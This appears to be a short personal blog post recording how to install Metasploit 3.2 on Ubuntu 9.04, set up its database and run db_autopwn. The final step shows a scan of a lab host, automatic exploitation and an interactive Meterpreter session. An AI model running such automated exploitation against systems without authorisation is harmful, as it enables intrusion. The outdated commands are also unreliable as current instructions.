So I just got a new computer and have been setting up my work environment. One thing I always forget is getting metasploit running with autopwn. I only seem to do this when I either get a new machine or rebuild, which is not that often. I feel like once you have autopwn going, metasploit is at a good point for exploiting and developing.
This post is going to be a quick reference list of getting the framwork up and going. At the time of this post it was Ubuntu 9.04 and Metasploit 3.2 .
1. Get Metasploit:
I always get metasploit through subversion. Do it anyway you like.
$sudo apt-get install subversion $svn co http://metasploit.com/svn/framework3/trunk/
2. Install Ubuntu debs:
Add any others that you think are necessary.
$apt-get install ruby rubygems sqlite libsqlite3-ruby libopenssl-ruby nmap
3. Create Metasploit DB:
In the example below, mine was already created.
msf > db_driver sqlite3 [*] Using database driver sqlite3 msf > db_create [*] The specified database already exists, connecting [*] Successfully connected to the database [*] File: /home/asdf/.msf3/sqlite3.db msf > db_connect [*] Successfully connected to the database [*] File: /home/asdf/.msf3/sqlite3.db msf >
4. Run autopwn:
This is all at the very basic level, just testing if it works.
msf > db_nmap 192.168.1.2 msf > db_autopwn -e -p -b msf > sessions Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 192.168.1.1:60781 -> 192.168.1.2:15786 msf > sessions -i 1 [*] Starting interaction with 1... meterpreter >
Like I said this is all basic and just a quick checklist to get it going. I have never wrote this down because I always felt like I would remember. Anyways if anyone else has some stuff they add or do to get their base framework going, I would love to hear about it.